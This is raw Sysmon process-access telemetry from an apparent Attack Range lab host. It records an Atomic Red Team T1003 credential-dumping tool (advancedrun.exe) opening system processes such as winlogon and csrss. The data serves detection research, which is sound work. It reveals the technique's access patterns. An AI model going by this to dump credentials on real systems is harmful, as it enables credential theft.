17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003980175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.325{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 